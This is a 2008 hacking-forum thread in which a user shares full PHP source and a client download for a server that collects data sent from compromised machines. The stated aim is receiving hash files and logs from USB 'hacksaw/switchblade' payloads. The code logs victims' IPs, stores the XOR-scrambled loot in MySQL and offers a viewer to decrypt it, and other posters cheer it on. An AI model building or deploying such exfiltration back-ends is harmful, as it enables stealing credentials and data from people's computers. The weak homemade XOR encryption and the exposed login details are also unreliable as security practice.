Steve8x Posted August 26, 2008 Share Posted August 26, 2008 OK well I've never used a hacksaw or a switchblade(since I prefer to create my own apps) Anyways from what I've gathered your hack/blade uses gmail to receive the log files... This is bad because your having to leave your EMAIL and PASSWORD on a remote machine... and I know gmail at least back when I made an account requires that you have a cell phone to create an account so its not like you can make that many! I was using FTP at first! for my app, but I still didn't like having to leave a username + password contained within the software! Here is my better, safer, anonymous method of getting your data. One day I was writing a post here on hak5 when it hit me! [CLIENT ON REMOTE MACHINE]->FREE WEBSERVER->PHP->MYSQL DATABASE Think about what I'm doing right now, I'm typing text into a box and when I click the "Post" button the php page that this form data gets submitted to inserts my post into the database... When you have seen my topic and clicked on my post the text I have posted was fetched from database and the HTML code was dynamically created by the php for your viewing pleasure... We(non hak5 admins) have no way knowing the MYSQL database password, and there isn't a reason for us to have it either, we can post data to the database without it... I have created a sample app, which can be modified for your needs... I'm sure you could get it to post your LM hash files or whatever files switch/saw saves to your database! Heres what you need... Find a free web provider which offers PHP and at least 1 MYSQL database also for free! If you can't find one that offers mysql you could run your own MYSQL database server, and find a free host with php and you could still keep your mysql password hidden... Because of the way PHP works, its server sided, you cannot see the php code, only the html code generated by it! THATS IT! Once you've got that setup your ready to receive your data! make the password a good strong password and change the username from root if you can... I had to do a little research on HTTP protocol, and also I used a packet sniffer and attached it to firefox, while I submitted a form on a website... My example program is called "SwiftSubmit" it lets you type up to 8000 characters into the box and once you click submit it sends a packet like this to the host you want it to connect to this is all anyone sniffing packets will see, where its going and other info, but the 'log' data is scrambled! POST /sendmeyourpackets/index.php HTTP/1.1 Host: popeax.com.. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate..Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 connection: keep-alive Referer: http://localhost/pwned.php Content-Type: application/x-www-form-urlencoded Content-Length: 346 name=Liz7783&log=.!HuMJUFQL@HPKBH.OJUFQL@[cut] Heres a picture of it, also with the nice little web front in the background I made for it to decode, decrypt and view the logs in the database... as you can see from this picture below of MySQL Query Browser, the data is encrypted in the database itself... If your wondering about the names, I like to name all my computers as well as log their IP, it just makes it easier for me... the software randomly chooses a name for the computer its run on Source Code + Binary http://popeax.com/sendmeyourpackets/SwiftSubmit.zip go ahead and test it out on my web server! I can kind of have my own little hak5 wall goin' lol! you can login to the webfront and see if anyone posted, or see if your post worked! http://popeax.com/sendmeyourpackets/viewlogs.php -> user: root, password: 1337 SOURCE: <?php include('config.php'); if(isset($_POST['auth'])) { $user = $_POST['user']; $pass = $_POST['pword']; $logininfo = "$user-$pass"; setcookie("chocolatechipcookie", $logininfo, time()+1200); // 1200 = 20 minutes echo "<meta http-equiv='refresh' content='0;url=$Self'>"; } if(isset($_COOKIE['chocolatechipcookie'])) // every time you refresh the page you'll stay logged in for 20 minutes { $logininfo = $_COOKIE['chocolatechipcookie']; setcookie("chocolatechipcookie", $logininfo, time()+1200); } ?> <html> <head> <title>Log Viewer v1.0 - by Steve8x</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <center> <?php //must change these to be secure so no one can read your logs but you $USER = "root"; $PASSWORD = "1337"; //very similar to my c++ version function XORbuffer($buffer, $password) { $passlength = strlen($password); $bufflength = strlen($buffer); $x = 0; for($i = 0; $i < $bufflength; $i++) { if($x == $passlength) { $x = 0; } $buffer[$i] = $buffer[$i] ^ $password[$x]; $x++; } return $buffer; } //if no cookie is set, then show the login page if(!isset($_COOKIE['chocolatechipcookie'])) { echo "<h1> Admin Login: </h1>"; echo "<p><form method='post' action='$Self'>"; echo "<table border='2' cellspacing='2' cellpadding='0'><tr>"; echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>"; echo "<td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>"; echo "<p> <input type='submit' name='auth' id='auth' value='Login'>"; echo "</form>"; die(); } else { //otherwise validate the username and password stored in the cookie! $logininfo = $_COOKIE['chocolatechipcookie']; list($usr, $pass) = split('-', $logininfo); //If you enter the wrong username or password you'll have to clear your cookies in your browser //its made that way as an annoyance to deter someone from attempting to guess // HOWEVER they shouldn't know about your page anyway... if($usr != $USER) { die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>"); } if($pass != $PASSWORD) { die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>"); } echo "<form method=\"post\" action=\"$Self\">"; echo "<input type=\"submit\" name=\"save\" id=\"save\" value=\"Save Logs To File!\"><p>"; echo "</form>"; //lets fetch that data from the database! $query = "SELECT * FROM data"; $result = mysql_query($query); if(isset($_POST['save'])) { $savefile = 1; $file = fopen("savedlogs.txt", "w"); } echo "<table border='1' cellspacing='1' cellpadding='1'>"; echo "<tr><th>ID</th><th>Name</th><th>IP</th><th>LOG</th></tr>"; while($row = mysql_fetch_array($result)) { $id = $row[0]; $name = $row[1]; $ip = $row[2]; $log = $row[3]; //change the password "hak5liverocks" here and also in your c++ program //they have to match so that this page can properly decrypt the stored data //the data is always stored encrypted in the database... //its only decrypted when you want to view it! //or save it to a text file $decoded = urldecode($log); $decrypted = XORbuffer($decoded, "hak5liverocks"); if($savefile == 1) { $preparedstring = "name-> $name ip-> $ip log-> $decrypted\r\n"; fwrite($file, $preparedstring); } echo "<tr><td>"; echo "$id"; echo "</td><td>"; echo "$name"; echo "</td><td>"; echo "$ip"; echo "</td><td>"; echo "$decrypted"; echo "</td></tr"; } if($savefile == 1) fclose($file); echo "</table>"; } ?> http://popeax.com/sendmeyourpackets/index.php SOURCE: <?php include ('config.php'); if(isset($_POST['name'])) // these means our little program is sending us data :) { $ip = $_SERVER['REMOTE_ADDR']; $name = $_POST['name']; $log = $_POST['log']; $name = mysql_real_escape_string($name); $log = mysql_real_escape_string($log); //insert the encrypted + minimally encoded data into the database! $query = "INSERT INTO data (name, ip, log) VALUES ('$name', '$ip', '$log')"; mysql_query($query); } else // otherwise someones just looking at the page { echo "<center><h1>You Got PWNED!</h1><img src=\"pwned.jpg\"></center>"; } // the \" are to escape the quotes! in this case you could of also just used single quotes ' ' // but thats not always the case so its good to know how to escape characters! ?> config.php SOURCE: <?php $dbhost = 'localhost:3306'; $dbuser = 'nottellingyou'; $dbpass = 'hak5liverocks'; $dbname = 'collecteddata'; $Self = $_SERVER['PHP_SELF']; $conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql'); $query = "CREATE DATABASE IF NOT EXISTS collecteddata"; // creates database for you if it doesnt exist yet $result = mysql_query($query); mysql_select_db($dbname); $query = "CREATE TABLE IF NOT EXISTS data(id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30) NOT NULL, ip VARCHAR(30) NOT NULL, log VARCHAR(8000) NOT NULL, PRIMARY KEY(id))"; // create table if not existant mysql_query($query); ?> Oh and the XOR encryption used is slightly better than what ive shown before in other topics... instead of XORing EACH byte of the buffer with EACH character of the password. I only xor each SUCCESSIVE character of the buffer which each SUCCESSIVE character of the password. This makes it way more secure, the previous method reduced the 'password' to only 1 character, this now requires all characters of the password so the plain text can be revealed well what do you think should I keep the encryption? or just go with encoding? With the encryption not all characters seem to come out exactly the same as when posted, there's something not quite right... thats not a big deal for text data, but as you can imagine for binary data or something where every single byte has to be right or it'll be messed up, its a problem... So I'm a little confused on how to get this working 100% smooth. Should I encode then encrypt? or encrypt then encode? lol !!! right now its about 95% just gotta figure out fully the encoding bit, I probably have to encode more chars than just '&' and spaces... thats probably whats messing up some characters sometimes... I know one problem though that I dealt with the best I could the '&' signs... if you encrypt your data and one of those just so happens to be a resulting character after the encryption, that's going to mess up your posted data, it will stop right there, and no more data will be gotten for that field(because it thinks your declaring data for another field), like "name", "log", etc... well if anyone is good with encoding+encrypting together let me know, And this thing will have perfect 100% readability... If I removed the encryption and just used encoding all the characters would always be readable but I'd lose the little security provided by it... So I'd rather keep it and figure something out to where the encoding + encrypting can work together! :) Quote Link to comment Share on other sites More sharing options...
hexlax Posted September 6, 2008 Share Posted September 6, 2008 woot! Quote Link to comment Share on other sites More sharing options...
Conor_M Posted September 6, 2008 Share Posted September 6, 2008 So you can send text over the internet (It's a series of tubes!), Encrypted, To a databse with this app? Nice work! Quote Link to comment Share on other sites More sharing options...
Steve8x Posted September 6, 2008 Author Share Posted September 6, 2008 Yeah and if you don't understand those tubes can be filled with your encrypted data, and if they are filled and 'posted' to a web page anywhere on the net, then you can process that data on the web page with php for example. What you do with the data from there is up to you. I choose to store it in a database, as I like that way the best. Since there are free web hosts which offer php + mysql this makes it an ideal method to use... Enormous amounts of material, enormous amounts of material!! lol ;) Quote Link to comment Share on other sites More sharing options...
pritchard9 Posted October 28, 2008 Share Posted October 28, 2008 Duuude, this is sweet. Why hasnt this been implemented? Or even BETA'd in a hacksaw release? Sounds well good! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.